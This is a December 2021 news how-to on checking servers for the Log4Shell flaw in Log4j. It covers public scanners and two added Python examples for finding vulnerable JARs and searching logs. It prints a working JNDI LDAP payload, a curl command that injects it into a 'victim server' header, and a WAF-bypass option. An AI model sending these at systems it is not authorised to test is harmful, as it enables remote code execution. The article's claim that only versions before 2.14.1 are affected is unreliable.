Cloud7 News

How to scan your server for Log4j (Log4Shell) vulnerability

The Apache Log4j vulnerability impacted hundreds of millions of devices. Enterprise IT and security teams are trying to discover whether their systems are affected.

by Ugur Kubilay Cam
December 16, 2021
in Cybersecurity, How-Tos

Log4j is a widely used software library for logging security and performance information. Security experts discovered a zero-day vulnerability in the popular library that affects many enterprise IT systems. Several vendors released tools in response, but a second vulnerability was discovered a short time later, and the Apache Software Foundation pushed out a new fix. If your system runs any Java application using a version of Log4j before 2.14.1, you should act very quickly. You can check your systems for the Log4j vulnerability with the following tools.

Tip: You can follow the updated list and solutions of the applications or systems affected by the Log4j vulnerability here. (The list is constantly updated)
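The tools below probe an application from the outside. To find out first which Java archives on a server bundle Log4j at all, the following added example (not part of the original article or of any tool listed here) walks a directory tree, opens JAR/WAR/EAR files including nested ones, and reports each log4j-core copy with its version and whether JndiLookup.class is present. The function names and the FIXED_FROM threshold are assumptions of this example.

```python
import io
import os
import re
import sys
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear")
# Assumption: treat 2.16.0 as the first patched release for both CVEs named on
# this page; set it to whatever the advisory you follow requires.
FIXED_FROM = (2, 16, 0)

def parse_version(text):
    """Return (major, minor, patch) from a pom.properties body, or None."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", text, re.MULTILINE)
    return tuple(int(g or 0) for g in m.groups()) if m else None

def inspect_archive(fileobj, label, findings, depth=0):
    """Record log4j-core copies in one archive, descending into nested archives."""
    try:
        zf = zipfile.ZipFile(fileobj)
    except (zipfile.BadZipFile, OSError):
        return  # unreadable or not a ZIP container: skip
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            text = zf.read(POM_PROPS).decode("utf-8", "replace") if POM_PROPS in names else ""
            version = parse_version(text)
            has_jndi = JNDI_CLASS in names  # False if the class was stripped as a mitigation
            needs_review = has_jndi and (version is None or version < FIXED_FROM)
            findings.append((label, version, has_jndi, needs_review))
        if depth < 4:  # fat JARs and WARs embed other JARs
            for name in names:
                if name.lower().endswith(ARCHIVE_EXT):
                    inspect_archive(io.BytesIO(zf.read(name)), f"{label}!{name}", findings, depth + 1)

def scan_tree(root):
    """Walk root and return sorted (label, version, has_jndi, needs_review) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                inspect_archive(path, path, findings)
    return sorted(findings, key=lambda f: f[0])

if __name__ == "__main__":
    for row in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(row)
```

Run it with the application directory as its argument; a copy with no readable version but with JndiLookup.class present (for example a shaded JAR) is flagged for review rather than assumed safe.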

Table of Contents

  • Apache Log4j CVE-2021-44228 Scanner
    • Usage
  • CISA Log4j Scanner
    • Usage
  • Huntress Labs log4shell tester
    • Usage
  • Trend Micro Log4j Vulnerability Tester
    • Usage

Apache Log4j CVE-2021-44228 Scanner

Scanning your system to check for the Apache Log4j vulnerability is very easy. All you have to do is run the open-source tool Apache Log4j CVE-2021-44228 Scanner, developed by Adil Soybali, a security researcher from Seccops Cyber Security Technologies Inc.

Features

  • Scanning according to the URL list you provide.
  • Scanning by finding the subdomains of the provided domain name.
  • Adding the source domain as a prefix to determine from which source the incoming DNS queries are coming.

Requirements

  • httpx
  • curl

Installation

git clone https://github.com/adilsoybali/Log4j-RCE-Scanner.git
cd Log4j-RCE-Scanner
chmod +x log4j-rce-scanner.sh

Usage

./log4j-rce-scanner.sh -h

This will display help for the tool. Here are all the switches it supports.

-h, --help - Display help
-l, --url-list - List of domain/subdomain/ip to be used for scanning.
-d, --domain - The domain name to which all subdomains and itself will be checked.
-b, --burpcollabid - Burp collabrator client id address or interactsh domain address.

Example uses:
./log4j-rce-scanner.sh -l httpxsubdomains.txt -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
./log4j-rce-scanner.sh -d adilsoybali.com -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
If the domain is vulnerable, DNS callbacks carrying the vulnerable domain name are sent to the Burp Collaborator or interactsh address you provided.
  • Burp collaborator documentation page
  • Easy way to set up a custom Burp Collaborator instance in a docker environment
  • Interactsh

Official GitHub Repository

  • https://github.com/adilsoybali/Log4j-RCE-Scanner

CISA Log4j Scanner

https://github.com/cisagov/log4j-scanner

This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The information and code in this repository are provided “as is” and were assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community. This is not intended to be a 100% true positive solution; false negatives may occur.

Usage

Scan a Single URL

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local

Scan a Single URL using all Request Methods: GET, POST (url-encoded form), POST (JSON body)

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests

Discover WAF bypasses on the environment.

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass

Scan a list of URLs

$ python3 log4j-scan.py -l urls.txt

Huntress Labs log4shell tester

https://log4shell.huntress.com

This tester provides a payload with a unique identifier, accepts LDAP connections from vulnerable apps, and displays the IP addresses it receives connections from. The sample code (payload) shown below can also be used to test this out.

Usage

Copy the generated JNDI syntax (the payload, i.e. the ${jndi[:]ldap[:]//.... code block presented below) and paste it into any input the application accepts: application input boxes, frontend site form fields, logins such as username inputs, or, if you are a bit more technical, the User-Agent, X-Forwarded-For or other customizable HTTP headers.

Sample Code (Payload):

${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}

How to send the Log4j payload to the victim server?

  1. You can send the payload to the victim server using a user agent switcher extension on your web browser.
  2. You can also send a curl request to the victim server via the Linux terminal:
curl http://vulnerable-app:8080 -H 'X-Api-Version: ${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}'
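To confirm which test requests reached the server and which field carried the string, the server's own access log can be searched for it. The following is an added example, not part of the original article: it parses Combined Log Format lines, percent-decodes the request, referer and user-agent fields, and reports every JNDI lookup string with its callback host. The log lines are constructed samples and the callback host is a placeholder.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Matches only the literal lookup form shown on this page (after percent-decoding).
# Group 1 is the scheme, group 2 the callback host.
JNDI_RE = re.compile(r"\$\{jndi:(\w+)://([^/:}\s]+)", re.IGNORECASE)

def find_jndi_lookups(lines):
    """Return one hit per logged field that carries a JNDI lookup string."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not Combined Log Format: skip
        for field in ("request", "referer", "agent"):
            found = JNDI_RE.search(unquote(m.group(field)))
            if found:
                hits.append({"line": lineno, "ip": m.group("ip"), "field": field,
                             "scheme": found.group(1).lower(),
                             "callback_host": found.group(2).lower()})
    return hits

# Constructed sample lines (documentation IP ranges, placeholder callback host).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [16/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://callback.example.test:1389/a}"',
    '198.51.100.9 - - [16/Dec/2021:10:01:09 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.test%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(hit)
```

Headers such as X-Api-Version or X-Forwarded-For are not written to a Combined Log Format line, so they only become searchable if the server's log format is extended to record them.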


Trend Micro Log4j Vulnerability Tester

log4j-tester.trendmicro.com

Usage

Watch the video below on how to use the Log4J tester.


Ugur Kubilay Cam

Ugur Kubilay Cam is the content marketing specialist of Cloud7 News. In addition to being an SEO expert, Ugur Kubilay is a Python developer and cybersecurity researcher. Ugur has a Bachelor's degree and a master's degree in Data Analysis. With more than 15 years of experience, Ugur Kubilay Cam is an active Linux user and administrator.
